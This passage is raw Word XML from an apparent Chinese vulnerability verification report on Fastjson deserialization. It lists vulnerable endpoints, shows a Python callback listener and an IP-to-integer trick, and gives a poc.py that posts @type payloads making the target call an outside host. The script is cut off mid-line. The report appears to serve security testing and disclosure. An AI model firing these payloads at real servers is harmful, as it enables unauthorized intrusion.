      <w:tr w:rsidR="00834902" w14:paraId="650514D3" w14:textId="77777777" w:rsidTr="008349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F39DA1F" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>/parse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6971C3D5" w14:textId="77777777" w:rsidR="0083490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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C72A3DC" w14:textId="77777777" w:rsidR="0083490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无限制 JSON.parse — 最危险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="0CFE5D4F" w14:textId="77777777" w:rsidTr="0083490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EFCBDB2" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>/parseObject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1105FD61" w14:textId="77777777" w:rsidR="0083490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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD6300E" w14:textId="77777777" w:rsidR="0083490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固定类型 JSON.parseObject — 嵌套 @type 仍可绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="30D15496" w14:textId="77777777" w:rsidTr="008349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54E5979" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>/user/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79CB2C27" w14:textId="77777777" w:rsidR="0083490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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0269D307" w14:textId="77777777" w:rsidR="0083490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包装对象，data 字段递归解析 @type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FFC8D1D" w14:textId="7684F0C6" w:rsidR="00834902" w:rsidRDefault="00000000" w:rsidP="000A79DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>四、验证步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BE7470" w14:textId="77777777" w:rsidR="00834902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步骤 1：启动回调监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0385E3E7" w14:textId="5E595C1D" w:rsidR="00834902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SSH 登录回调服务器 </w:t>
      </w:r>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>******</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，运行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284C818" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python3 -c "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>class H(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>.BaseHTTPRequestHandler):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    def do_GET(s):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">f'!!! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>收到回调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>: {s.client_address[0]} -&gt; {s.path}')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        print(f'    UA: {s.headers.get("User-Agent","")}')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        s.send_response(404); s.end_headers()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    do_HEAD = do_GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    def log_message(s,*a): pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>http.server.HTTPServer(('0.0.0.0',6111),H).serve_forever()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD1CE1" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>预期输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49CD9C" w14:textId="51A34019" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回调监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>: 0.0.0.0:6111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等待目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*******</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发起请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961CCD6" w14:textId="77777777" w:rsidR="00834902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步骤 2：计算回调 IP 整数形式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC0E8C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 会把 . 替换为 /，所以回调 IP 必须使用整数形式避免被拆散。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34902" w14:paraId="07F8198E" w14:textId="77777777" w:rsidTr="008349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BC704C7" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>原始</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D0EF9C5" w14:textId="77777777" w:rsidR="0083490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计算方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0290CC3E" w14:textId="77777777" w:rsidR="0083490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整数结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="3D3997BB" w14:textId="77777777" w:rsidTr="008349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3F90473" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>1.12.37.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132C9287" w14:textId="77777777" w:rsidR="0083490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1×256³ + 12×256² + 37×256 + 40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FFDF8AB" w14:textId="77777777" w:rsidR="0083490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17573160</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="657EB214" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48829E9A" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Python 验证：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B6504" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import socket, struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>print(struct.unpack("!I", socket.inet_aton("1.12.37.40"))[0])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 17573160</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2F39F3" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>步骤 3：运行 PoC 发送 Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CEDD8B" w14:textId="050AA2EC" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在 Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>测试终端运行以下</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  poc.py</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F15F529" w14:textId="74269D95" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>import socket, struct, json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>urllib.request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> import Request, urlopen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>TARGET = "http://</w:t>
      </w:r>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>:8080"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>CB_IP = "</w:t>
      </w:r>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">CB_PORT = </w:t>
      </w:r>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">cb_int = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>struct.unpack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>"!I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>socket.inet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>aton(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>CB_IP</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>))[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>0]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>payloads = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>http:..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>直连</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>",    "/parse",       {"@type": f"http:..{cb_int}:{CB_PORT}.A"}),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ("jar:http:.. SB",  "/parse",       {"@type": f"jar:http:..{cb_int}:{CB_PORT}.x!.F.Exception"}),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>固定类型绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>",     "/parseObject", {"name":"t","@type": f"http:..{cb_int}:{CB_PORT}.B"}),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>包装对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>",        "/user/create", {"type":"u","data":{"@type": f"http:..{cb_int}:{CB_PORT}.C"}}),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ("FD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK17+",    "/parse",       {"@type": "jar:file:.proc.self.fd.3!.fd3.Exception"}),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>]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>for name, endpoint, body in payloads:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>(body).encode()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    req = Request(f"{TARGET}{endpoint}", data=data,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                  headers={"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>"})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        resp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>urlopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
